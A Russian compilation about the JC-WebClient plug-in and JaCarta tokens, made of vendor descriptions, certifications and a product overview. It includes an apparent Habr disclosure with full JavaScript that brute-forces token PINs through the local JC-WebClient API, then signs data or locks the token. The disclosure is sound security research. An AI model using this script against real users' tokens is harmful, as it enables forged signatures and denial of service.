Jc webclient что это за программа

JC-WebClient — решение для реализации функций строгой двухфакторной аутентификации, работы с ЭП и шифрования данных в Web-приложениях и облачных сервисах с использованием USB-токенов и смарт-карт семейства JaCarta или eToken.

JC-WebClient — решение, позволяющее легко встроить в Web-приложения и облачные сервисы функции для работы с USB-токенами и смарт-картами JaCarta или eToken. С его помощью можно осуществлять строгую взаимную двухфакторную аутентификацию пользователя и Web-сервера, работать с усиленной и усиленной квалифицированной электронной подписью, безопасно подтверждать транзакции/операции при работе в недоверенной среде, а также шифровать данные с использованием российских или зарубежных криптоалгоритмов.

Главное отличие JC-WebClient от конкурирующих решений — реализация единой технологии для работы с браузерами. За счёт этого JC-WebClient штатно поддерживает работу со всеми популярными браузерами: Google Chrome, Opera, «Яндекс.Браузер», Mozilla Firefox, Apple Safari, Microsoft Internet Explorer, Microsoft Edge, «Спутник» и др. Эта особенность позволяет избавить разработчиков от постоянных доработок своих Web-приложений под конкретный браузер, а пользователей — от проблем с выбором одного из нескольких вариантов дистрибутивов для установки.

JC-WebClient работает на всех популярных платформах: Microsoft Windows, Apple macOS и GNU/Linux. Кроссплатформенность максимально расширяет аудиторию пользователей Web-приложений, так как им не нужно иметь определённую операционную систему — достаточно приобрести токены JaCarta и установить приложение JC-WebClient, что может сделать даже неподготовленный пользователь.

Установка приложения JC-WebClient состоит из трёх простых шагов: необходимо зайти на нужный пользователю Web-сайт, скачать дистрибутив приложения JC-WebClient, запустить процесс установки и дождаться его окончания. Приложение работает в фоновом режиме и не требует от пользователя каких-либо действий по запуску или настройке. Сервис мониторинга, реализованный в составе JC-WebClient, контролирует целостность приложения и перезапускает его при возникновении нештатных ситуаций в операционной системе.

Источник: cps.ru

JC-WebClient

Запускает приложение JC-WebClient при загрузке операционной системы.

• Контролирует целостность приложения и перезапускает его при возникновении нештатных ситуаций в операционной системе.
• Обеспечивает надёжность и отказоустойчивость решения.

Опция «Антифрод-терминал»

Trust Screen-устройство для безопасной аутентификации, работы с ЭП и подтверждения операций/транзакций в недоверенной среде.

• Надёжно защищает от атак со стороны вредоносного ПО и злоумышленников, получивших удалённое управление ПК пользователя, направленных на выполнение несанкционированных операций от лица пользователя.
• При интеграции со средствами ЭП обеспечивает визуализацию и подтверждение ключевых данных подписываемых документов.

• Возможности
• Преимущества
• Сертификаты
• Технические требования

• строгой двухфакторной взаимной аутентификации пользователя и Web-сервера;
• работы с усиленной и усиленной квалифицированной электронной подписью;
• безопасного подтверждения транзакций/операций при работе в недоверенной среде;
• шифрования данных с использованием российских или зарубежных криптоалгоритмов.

• Поддерживает все основные ОС
• Работает со всеми популярными браузерами
• Легко интегрируется в Web-приложения
• Легко устанавливается
• Удобно в использовании
• Обладает повышенной отказоустойчивостью
• Поддерживает российскую и зарубежную криптографию
• Поддерживает популярные токены
• Обеспечивает высокий уровень ИБ
• Обеспечивает безопасную работу в недоверенной среде
• Поддерживает новое поколение токенов JaCarta-2 ГОСТ

В состав решения JC-WebClient входят устройства JaCarta-2 ГОСТ, JaCarta ГОСТ или eToken ГОСТ, сертифицированные во ФСТЭК России и ФСБ России.

Сертификат соответствия ФСБ России № СФ/124-3112

Подтверждает, что СКЗИ «Криптотокен 2 ЭП» в составе JaCarta-2 ГОСТ соответствует требованиям ГОСТ 28147-89, ГОСТ Р 34.11-94, ГОСТ Р 34.10-2001, ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012, а также требованиям к СКЗИ класса КС1 и КС2 и требованиям к средствам ЭП класса КС1 и КС2 и может использоваться для криптографической защиты информации, не содержащей сведений, составляющих государственную тайну.

Сертификат соответствия ФСБ России № СФ/111-2750

Подтверждает, что персональное средство ЭП «Криптотокен ЭП», предназначенное для использования совместно с СКЗИ «Криптотокен» в составе JaCarta ГОСТ (eToken ГОСТ), соответствует требованиям к средствам ЭП класса КС1 и КС2 и может использоваться для реализации функций электронной подписи в соответствии с 63-ФЗ «Об электронной подписи» от 6 апреля 2011 года.

Сертификат соответствия ФСТЭК России № 2799

Подтверждает, что JaCarta является программно-техническим средством защиты информации, не содержащей сведений, составляющих государственную тайну, от несанкционированного доступа и соответствует требованиям по 4 уровню контроля отсутствия недекларированных возможностей (НДВ 4) и требованиям Технических условий.

Microsoft

• Microsoft Windows 10
• Microsoft Windows 8-8.1
• Microsoft Windows 7
• Microsoft Windows Vista
• Microsoft Windows ХP

Linux

• CentOS 7 (64-бит)
• Debian 8.4
• Debian 7.10 (64-бит)
• Fedora 23 (64-бит)
• openSUSE Leap 42.1 (64-бит)
• openSUSE 13.2
• Red Hat Enterprise 7.2 (64-бит)
• Ubuntu 16.04
• Ubuntu 14.04

Apple

• macOS 10.12 (Sierra)
• OS X 10.11 (El Capitan)
• OS X 10.10 (Yosemite)
• OS X 10.9 (Mavericks)

• Google Chrome
• Mozilla Firefox
• Microsoft Internet Explorer 8-11
• Microsoft Edge
• Apple Safari
• Opera
• «Яндекс.Браузер»
• «Спутник»

JaCarta

• JaCarta-2 ГОСТ
• JaCarta ГОСТ
• JaCarta PRO
• Комбинированные токены семейства JaCarta-2 ГОСТ и JaCarta, имеющие функциональность PRO и/или ГОСТ

eToken

• eToken ГОСТ
• eToken PRO (Java)

• Поддержка цифровых сертификатов X.509
• Генерация запросов на сертификат в формате PKCS#10
• Формирование и проверка ЭП в формате PKCS#7
• Проверка цепочек сертификатов

При работе с устройствами JaCarta-2 ГОСТ (средство ЭП «Криптотокен 2 ЭП»)

• ГОСТ 28147-89 (симметричное шифрование)
• ГОСТ Р 34.11-94 (функция хэширования)
• ГОСТ Р 34.10-2001 (генерация ключевых пар, формирование и проверка ЭП)
• ГОСТ Р 34.10-2012 (генерация ключевых пар, формирование и проверка ЭП)
• ГОСТ Р 34.11-2012 (функция хэширования)
• Выработка ключа парной связи на основе преобразований по алгоритмам VKO GOST R 34.10-2001 (в соответствии с RFC 4357) и VKO GOSTR3410_2012_256 (в соответствии с рекомендациями Технического комитета 026)

При работе с устройствами JaCarta ГОСТ и eToken ГОСТ (средство ЭП «Криптотокен ЭП»)

• ГОСТ 28147-89 (симметричное шифрование)
• ГОСТ Р 34.11-94 (функция хэширования)
• ГОСТ Р 34.10-2001 (генерация ключевых пар, формирование и проверка ЭП)

При работе с устройствами JaCarta PRO и eToken PRO (Java)

• 3DES (симметричное шифрование)
• AES-128 (симметричное шифрование)
• SHA-1 (функция хэширования)
• RSA 1024 (генерация ключевых пар, формирование и проверка ЭП)

• Усиленная (с использованием российских или западных криптоалгоритмов)
• Усиленная квалифицированная (при выпуске сертификата ЭП в аккредитованных УЦ)

• Microsoft Windows — нет
• Linux — нет
• Apple macOS/OS X — есть

• примеры интеграции в виде демо-портала с исходными кодами на Microsoft ASP.NET;
• документация для разработчиков;
• АРМ Разработчика JaCarta-2 ГОСТ.

При встраивании в прикладное ПО СКЗИ или средств ЭП с использованием российских криптоалгоритмов разработчик должен иметь лицензию ФСБ России.

Источник: it-enigma.ru

Тестируем JaCarta WebClient или храните токены в сейфе

«Когда на мгновение чёрный покров отнесло в сторону, Маргарита на скаку обернулась и увидела, что сзади нет не только разноцветных башен с разворачиващимся над ними аэропланом, но нет уже давно и самого города, который ушёл в землю и оставил по себе только туман.»

М.А. Булгаков
«Мастер и Маргарита»

Привет, Хабр! Наверное почти в каждой российской организации есть эти изделия в весёлой разноцветной раскраске. Речь идёт об изделиях JaCarta и софте к ним. Привалило такое счастье и мне, и я решил немного раздвинуть чёрный покров скрывающий их сущность, сиречь API. Некоторые банки, особенно выдающие своим клиентам токены JaCarta ГОСТ-2, для работы требуют установки приложения JC-WebClient от «Аладдин Р.Д.».

Хотя на официальном сайте разработчика свежего дистрибутива нет (в разделе Демо можно скачать более старую версию, но она использует устаревший API), дистрибутив можно найти с помощью гугла по строке «JC-WebClient-4.0.0.1186» на сайтах ДБО.

После установки приложения на компе пользователя открывается порт 24738 на котором работает этот клиент.

На сайте разработчика открыто и подробно описан API этого приложения (как и функции работы с файловой системой всей линейки токенов этого производителя через jcFS.dll, входящей в установочный пакет «Единый клиент JaCarta») и суть в том, что с помощью ряда функций можно или подписать ЭЦП находящейся на токене что угодно, подобрав пин код, или заблокировать токен неудачными попытками его ввода. И всё это дистанционно, через интернет.

Не секрет, что пользователи часто оставляют у токена пин код по умолчанию, или тот с которым его получили (обычно боятся, что при смене пин кода всё перестанет работать).

Чаще всего используются пин коды вида 123456, а токен в течении рабочего дня, а то и круглосуточно, воткнут в порт компа или usb хаба.

Благодаря JC-WebClient, если такому пользователю подсунуть вебстраницу или письмо с нехитрым JavaScript’ом, то появляется возможность хотя и не получить ключи токена (это в ряде случаев возможно только путём непосредственного доступа к файловой системе токена, пример здесь уже давался), но попытаться подобрать пин код и подписать какие-либо данные и куда-то их отправить.

В случае 10 неудачных попыток перебора токен блокируется, и как часто это бывает, если не установлен пин код администратора для разблокировки, то поможет только инициализация. А это не в срок уплаченные налоги (и как результат пени и даже блокировка расчётного счёта организации налоговой), неустойки от поставщиков, в общем хорошего мало.

Проблему с перебором пин кода можно было бы решить или сделав возможность его ввода только через интерфейсное окно JC-WebClient, или как полумера, в случае например 3-х неудачных попыток его ввода, блокировать дальнейшую авторизацию, выведя сообщение пользователю, и ожидать пока он не подтвердит свои действия.

Я написал небольшой тестовый скрипт, который показывает эту уязвимость. Скрипт работает на всех современных и относительно современных браузерах, даже IE 🙂

Естественно он ничего никуда не отправляет, а просто выводит на экран результаты работы последовательности функций.

В скрипте реализован полный перебор 10 попыток ввода пин кода «на убой» токена, поэтому запускать скрипт можно только с тестовым токеном!

Также следует помнить, что применение этого скрипта иначе кроме как на собственном тестовом токене является нарушением законодательства.

Скрипт генерации ключевой пары и сертификата средствами JC-WebClient для тестирования.
Использовать можно EToken PRO Java 72 K, JaCarta ГОСТ, JaCarta ГОСТ-2. Токен должен быть предварительно инициализирован с пин кодом пользователя 111111.

Перед началом тестирования необходимо установить JC-WebClient версии не ниже 4.

//Инициализация JCWebClient2 JCWebClient2.initialize(); document.write(«JC-WebClient был успешно инициализирован»+» «); //Получаем версию JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(«Версия JCWebClient2 » + vers +» «); //Получаем доступ к слотам и определяем число подключенных токенов var slots = JCWebClient2.getAllSlots(); document.write(«Подключено токенов: «+slots.length+» «); //Выводим модель токенов for (i = 0; i < slots.length; i++) < var slot = slots[i]; document.write(«Токен: «+slot.device.name+» «+slot.device.model+» «); >var tokenID = slot.id, // Идентификатор токена userPin = ‘111111’; // PIN-код пользователя // Проверить текущее состояние аутентификации на токене // (должно равняться JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write(‘1) Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); // Предъявить PIN-код JCWebClient2.bindToken( < args: < tokenID: tokenID, pin: userPin >>); // Проверить изменившееся состояние // (должно равняться JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write(‘2) Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); // Создать контейнер с ключевой парой и присвоить ему имя var keyPairID = JCWebClient2.createKeyPair( < args: < paramSet: «XA», description: «my description», algorithm: JCWebClient2.Vars.KeyAlgorithm.GOST_2012_256 >>); // Задать отличительное имя пользователя (Distinguished Name (DN)), // включающее стандартное имя (Common Name, (CN)) var dn = < ‘CN’: ‘123’, ‘C’: ‘RU’ >; // Задать расширения, определяющие область применения закрытого ключа var exts = < ‘keyUsage’: ‘Digital Signature’ >; // Записать сертификат var contID = JCWebClient2.generateUserSelfSignedCertificate( < args: < keyPairID: keyPairID, dn: dn, exts: exts, days: 365 >>); //Массив информации на токенах var list=[]; //Получаем список контейнеров list = JCWebClient2.getContainerList( < args: < tokenID: tokenID >>); //Получаем id и информацию о созданном контейнере var data = list[0]; var contID = data.id; document.write(«ID контейнера: «+data.id+» «); document.write(«Описание контейнера: «+data.description+» «); document.write(«Алгоритм подписи: «+data.algorithm+» «); // Отменить ввод PIN-кода JCWebClient2.unbindToken();

И собственно сам скрипт аудита безопасности:

//Инициализация JCWebClient2 JCWebClient2.initialize(); document.write(«JC-WebClient был успешно инициализирован»+» «); //Получаем версию JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(«Версия JCWebClient2 » + vers +» «); //Получаем доступ к слотам и определяем число подключенных токенов var slots = JCWebClient2.getAllSlots(); document.write(«Подключено токенов: «+slots.length+» «); //Выводим модель токенов for (i = 0; i < slots.length; i++) < var slot = slots[i]; document.write(«Токен: «+slot.device.name+» «+slot.device.model+» «); >// Идентификатор токена var tokenID = slot.id; // Проверить текущее состояние аутентификации на токене // (должно равняться JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write(‘Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); //Массив информации на токенах var list=[]; //Получаем список контейнеров list = JCWebClient2.getContainerList( < args: < tokenID: tokenID >>); //Получаем id и информацию о контейнере var data = list[0]; var contID = data.id; document.write(«ID контейнера: «+data.id+» «); document.write(«Описание контейнера: «+data.description+» «); document.write(«Алгоритм подписи: «+data.algorithm+» «); // Данные для подписи (Hello World закодированное Base64) var dataToSign = ‘SGVsbG8sIFdvcmxkIQ==’; document.write(«Данные для подписи: «+dataToSign+» «); //Массив пин кодов var pin=[«1234567890», «123456», «1234567», «12345678», «123456789», «0987654321», «111111», «qwerty», «012345», «0123456», «01234567»]; //функция авторизации function bind(pass) < JCWebClient2.bindToken(< args: < tokenID: tokenID, pin: pass >>); > var i=0; //Перебор пин кодов в цикле //Осторожно! При 10 неверных попытках токен блокируется. while (i < 10) < i++; try< bind(pin[i]); tokenState = JCWebClient2.getLoggedInState(); //Если атака удалась, выводим результат и завершаем цикл if(tokenState.state=1) < document.write(«Успешно подобран пин код: «+pin[i]+» «); break; >> //Вывод информации об ошибке catch(e) > // Проверить изменившееся состояние // (должно равняться JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write(‘Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); //Получаем содерижимое сертификата var CertificateBody=JCWebClient2.getCertificateBody( < args: < id: contID >>); document.write(«CertificateBody: «+CertificateBody+» «); // Подписать данные, используя программное хэширование и вывести подписанное в Base64 var signedData = JCWebClient2.signBase64EncodedData( < args: < contID: contID, data: dataToSign, attachedSignature: true >>); document.write(«Подписано успешно. «); document.write(«Подписанные данные: «+signedData+» «); //Проверка подписи var signature = signedData; var res = JCWebClient2.verifyBase64EncodedData( < args: < signature: signature >>); document.write(«Результат проверки подписи: «+res+» «); // Отменить ввод PIN-кода JCWebClient2.unbindToken();

• etoken
• jacarta
• информационная безопасность

• Информационная безопасность
• Тестирование IT-систем
• JavaScript
• Расширения для браузеров

Источник: habr.com

Обзор платформы JaCarta от Аладдин Р. Д.

В данной статье рассматривается платформа JaCarta, поддерживающая технологии электронной подписи и строгой аутентификации, приводится краткий обзор продуктов и описание принципов их работы.

Введение

На сегодняшний день без надежной системы аутентификации пользователей не обходится ни одна уважающая себя компания. Специалисты по информационной безопасности (ИБ) рекомендуют использовать многофакторную аутентификацию, основанную не только на знании секрета (пароля), но и на владении специальным устройством (токеном). Нередко в качестве третьего фактора выступает одна или несколько биометрических характеристик пользователя. В этом случае возникает проблема учета и регистрации всех аппаратных и программных средств аутентификации и хранения ключевой информации, используемых сотрудниками в масштабах предприятия.

Еще одна тенденция в сфере ИБ связана с ростом числа мобильных устройств, с которых сотрудники компаний работают с конфиденциальной корпоративной информацией. Все чаще применяется модель BYOD (Bring Your Own Device), позволяющая сотруднику для выполнения своих профессиональных обязанностей использовать личные мобильные устройства. При этом появляется необходимость в механизме многофакторной аутентификации в отношении владельцев смартфонов или планшетов.

Изменение законодательства в области защиты персональных данных, принятие требований по сертификации средств защиты информации, развитие дистанционного банковского обслуживания (ДБО) и интернет-банкинга требует от участников рынка внедрения отечественных систем аутентификации и электронной подписи (ЭП).

Для эффективного решения поставленных задач российская компания «Аладдин Р. Д.» разработала платформу JaCarta — семейство аппаратных и программных продуктов, позволяющих осуществлять аутентификацию пользователей, генерировать ЭП и безопасно хранить криптографические ключи и цифровые сертификаты, а также централизованно управлять ключевыми носителями на протяжении их жизненного цикла.

Состав продуктовой линейки JaCarta

В состав платформы JaCarta входят:

• токены JaCarta PKI, предназначенные для строгой двухфакторной аутентификации пользователей в корпоративных (включая интеграцию с продуктами Microsoft, Citrix, VMware, Wyse и др.) и государственных системах, а также безопасного хранения ключей и ключевых контейнеров программных средств криптографической защиты информации (СКЗИ);
• токены JaCarta PKI/BIO, предназначенные для строгой двух- или трехфакторной аутентификации с применением биометрической идентификации;
• токены JaCarta ГОСТ и JaCarta² ГОСТ, предназначенные для обеспечения юридической значимости действий пользователей с помощью ЭП и передачи зашифрованных данных между клиентом и сервером при работе с web-порталами и облачными сервисами;
• токены JaCarta WebPass, предназначенные для генерации одноразовых паролей, безопасного хранения сложного многоразового пароля и его подстановки в экранные формы по нажатию кнопки на токене, а также запуска браузера и автоматического перехода по сохраненному адресу сайта;
• токены JaCarta U2F, предназначенные для использования в качестве второго фактора при парольной аутентификации конечных пользователей онлайн-сервисов по стандарту FIDO U2F;
• система управления JaCarta Management System, автоматизирующая типовые операции при работе с токенами и предоставляющая централизованное управление доступом к корпоративным системам;
• автономный сервер аутентификации JaCarta Authentication Server, позволяющий организовать усиленную аутентификацию по одноразовым паролям (OTP);
• решение JC-WebClient для реализации функций строгой двухфакторной аутентификации и работы с ЭП с использованием токенов JaCarta на web-порталах и в облачных сервисах;
• решение JC-Mobile для реализации функций строгой двухфакторной аутентификации и работы с ЭП с использованием токенов JaCarta в мобильных приложениях на Google Android и Apple iOS;
• TrustScreen-устройство «Антифрод-терминал» для работы с электронной подписью в недоверенной среде;
• программно-аппаратное решение JaCarta SecurLogon, предназначенное для обеспечения двухфакторной аутентификации пользователей ОС Microsoft Windows с применением токенов JaCarta без развертывания PKI-инфраструктуры.

Токены JaCarta выпускаются в нескольких функционально идентичных исполнениях (форм-факторах): смарт-карта, USB-токен в корпусе Nano и XL, MicroUSB-токен, USB-токен с кнопкой (для JaCarta WebPass и JaCarta U2F). Большинство форм-факторов позволяют совмещать в одном устройстве несколько функций, что дает возможность сократить число ключевых носителей пользователя, реализуя необходимые функции в одном токене (например, двухфакторную аутентификацию и ЭП).

Рисунок 1. Смарт-карта, USB- и MicroUSB-токены JaCarta

MicroUSB-токены и смарт-карты JaCarta позволяют организовать строгую двух- и трехфакторную аутентификацию и усиленную квалифицированную ЭП на мобильных устройствах, обеспечивая защиту транзакций в условиях недоверенной среды. Для подключения смарт-карт JaCarta к мобильным устройствам можно использовать проводные или Bluetooth-считывателя смарт-карт. MicroUSB-токены JaCarta можно подключить напрямую (если есть порт MicroUSB) или через переходник MicroUSB-to-USB.

На основе смарт-карт JaCarta выпускается решение Электронное удостоверение JaCarta, объединяющее функциональные возможности бесконтактного пропуска (за счет включения RFID-метки и интеграции со СКУД), средства доступа в информационную систему, средства ЭП, защищенного хранилища пользовательских данных, банковской карты и обычного удостоверения сотрудника.

Компоненты платформы JaCarta имеют следующие сертификаты соответствия:

• сертификаты ФСТЭК России № 2799 и 3449, подтверждающие, что токены семейства JaCarta являются средством аутентификации и безопасного хранения пользовательских данных, соответствуют требованиям по 4 уровню контроля отсутствия недекларированных возможностей и могут использоваться в автоматизированных системах, обрабатывающих конфиденциальную информацию до класса защищенности 1Г включительно, а также в информационных системах персональных данных (ИСПДн) до 1 класса включительно;
• сертификат ФСТЭК России № 3355, выданный на программное обеспечение JaCarta Management System, подтверждающий соответствие 4 уровню контроля отсутствия недекларированных возможностей и требованиям Технических условий;
• сертификат ФСТЭК России № 3575, подтверждающий, что JaCarta SecurLogon является программно-техническим средством защиты от несанкционированного доступа к информации и соответствует требованиям по 4 уровню контроля отсутствия недекларированных возможностей;
• сертификат ФСБ России № СФ/111-2750, подтверждающий что персональное средство ЭП «Криптотокен ЭП» в составе JaCarta ГОСТ соответствует требованиям к средствам ЭП классов КС1 и КС2 и может использоваться для реализации функций ЭП в соответствии с 63-ФЗ «Об электронной подписи»;
• сертификаты соответствия ФСБ России № СФ/124-2963 и № СФ/124-2964, подтверждающие, что СКЗИ «Криптотокен 2» в составе JaCarta ГОСТ соответствует требованиям ФСБ к СКЗИ по классам защиты КС1 и КС2 и может использоваться для криптографической защиты информации, не содержащей сведений, составляющих государственную тайну;
• Common Criteria EAL 4+ — международный сер­тификат на используемые в устройствах JaCarta микроконтроллер (чип) и операционную систему на соответствие профилю безопасно­сти Smart Card Security User Group — Smart Card Protection Profile;
• Common Criteria EAL 5+ — международный сер­тификат на используемые в устройствах JaCarta микроконтроллер (чип) и операционную систему на соответствие профилю защиты Security IC Platform Protection Profile, версия 1.0. Оценка соответствия выполнена по методике Common Criteria (версия 3.1, ревизия 3). Достигнутый уровень доверия — EAL 5+ (усиленный).

Токены и смарт-карты JaCarta PKI

JaCarta PKI — семейство PKI-токенов и смарт-карт для строгой двухфакторной аутентификации пользователей в корпоративных системах, безопасного хранения ключевых контейнеров программных СКЗИ и цифровых сертификатов.

Токены JaCarta PKI доступны форм-факторах USB-токен (в корпусе Nano или XL), MicroUSB-токен и смарт-карта.

Подробная информация о линейке продуктов JaCarta PKI представлена на сайте производителя.

Токены и смарт-карты JaCarta PKI/BIO

Токены JaCarta PKI/BIO обладают всеми функциями токенов JaCarta PKI и отличаются от них функцией биометрической идентификации по отпечатку пальца (в качестве третьего фактора аутентификации или вместо PIN-кода). Могут поставляться в форм-факторах USB-токен (в корпусе XL) и смарт-карта.

Рекомендуемым форм-фактором является смарт-карта, так как для USB-токенов необходимо предварительное тестирование на совместимость с используемыми сканерами (например, встроенными в ноутбуки или в клавиатуры).

Подробная информация о линейке продуктов JaCarta PKI представлена на сайте производителя.

Токены и смарт-карты JaCarta ГОСТ и JaCarta² ГОСТ

Токены JaCarta ГОСТ являются персональным средством ЭП со встроенной сертифицированной российской криптографией для формирования усиленной квалифицированной ЭП с неизвлекаемым ключом, а также хранения ключевых контейнеров программных СКЗИ. JaCarta² ГОСТ отличается применением сертифицированных новых российских криптографических алгоритмов ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012.

JaCarta ГОСТ и JaCarta² ГОСТ производятся в нескольких форм-факторах: USB-токен (в корпусах Nano или XL), MicroUSB-токен, смарт-карта.

И в JaCarta ГОСТ, и в JaCarta² ГОСТ криптоалгоритмы реализованы на уровне микропроцессора, а схема работы с неизвлекаемым закрытым ключом подписи исключает возможность хищения закрытого ключа подписи, при этом формирование ЭП с его использованием выполняется внутри устройства.

Устройства предназначены для обеспечения юридической значимости действий пользователей при использовании различных электронных сервисов:

• ДБО;
• электронные торговые площадки;
• сдача электронной отчетности;
• электронное декларирование грузов, перемещаемых через границу;
• публичные или корпоративные web-порталы и облачные сервисы, (например, Портал государственных услуг);
• системы корпоративного/ведомственного электронного документооборота.

Смарт-карты JaCarta ГОСТ могут применяться как с обычными считывателями, так и с «Антифрод-терминалом» — снабженным дисплеем и клавиатурой устройством, предназначенным для формирования с помощью JaCarta ГОСТ ЭП в недоверенной среде.

Подробная информация о линейке продуктов JaCarta ГОСТ и JaCarta² ГОСТ представлена на сайте производителя.

Токены JaCarta WebPass

JaCarta WebPass — USB-токены для генерации OTP, безопасного хранения сложного многоразового пароля и его подстановки в экранные формы по нажатию кнопки, а также запуска браузера и автоматического перехода по сохраненному адресу web-ресурса.

Токены JaCarta WebPass поддерживают установку разных режимов работы в зависимости от характера нажатия кнопки: одинарное, двойное или длительное нажатие. По умолчанию, при одинарном нажатии генерируется OTP, а к остальным типам нажатия действия не назначены.

Токены JaCarta U2F

JaCarta U2F — универсальный USB-токен, предназначенный для осуществления двухфакторной аутентификации конечных пользователей онлайн-сервисов, поддерживающих стандарт FIDO U2F. К таким сервисам относятся сервисы Google (Google Cloud Platform, Gmail, Google Drive, YouTube, Google Wallet, Google+), облачный сервис Dropbox, хостинг совместной разработки GitHub.

В отличие от PKI-токенов JaCarta U2F поддерживают самостоятельную регистрацию пользователей — при регистрации токена JaCarta U2F на конкретном web-ресурсе не требуется участия администратора. В процессе регистрации пользователем своего U2F-токена на web-ресурсе происходит генерация ключевой пары (открытый и закрытый ключ) без сертификата открытого ключа. Сгенерированная ключевая пара используется для дальнейшей аутентификации. В связи с этим один токен может использоваться для доступа к множеству различных web-ресурсов.

Токены JaCarta U2F обеспечивают защиту от фишинговых атак, поскольку закрытый ключ, хранящийся в памяти токена, соответствует URL-адресу определенного web-ресурса.

Основные компоненты типового решения с поддержкой U2F-аутентификации на базе токена JaCarta U2F представлены ниже.

Рисунок 2. Архитектура типового решения с поддержкой U2F-аутентификации на базе токена JaCarta U2F

В состав типового решения с поддержкой U2F-аутентификации на базе токена JaCarta U2F входят следующие компоненты:

• Web-сервер, на котором установлено одно или несколько web-приложений и U2F-сервер — приложение, реализующее серверную часть протокола U2F и обеспечивающее хранение информации, полученной в процессе регистрации и аутентификации. Web-приложение при получении запросов на регистрацию и аутентификацию пользователей обращается к U2F-серверу для проверки и сохранения полученных от пользователя данных.
• U2F-клиент — приложение, посредством которого пользователь взаимодействует с web-сервисом (например, web-браузер или мобильное приложение). U2F-клиент реализует клиентскую часть протокола U2F, взаимодействует с web-сервером по протоколу HTTPS и U2F-токеном по протоколу USB HID.
• Токен JaCarta U2F — устройство, используемое в качестве второго фактора аутентификации при доступе к web-ресурсам и реализующее интерфейс USB HID.

Один токен JaCarta U2F можно применять для ПК, ноутбуков и мобильных устройств (при наличии USB-разъема или MicroUSB-разъема). При этом поддержка U2F обеспечивается из соответствующего приложения (например, Google Chrome).

Подробная информация о JaCarta U2F и описание принципов работы доступны на сайте производителя.

Таблица 1. Сравнение моделей токенов JaCarta

Источник: www.anti-malware.ru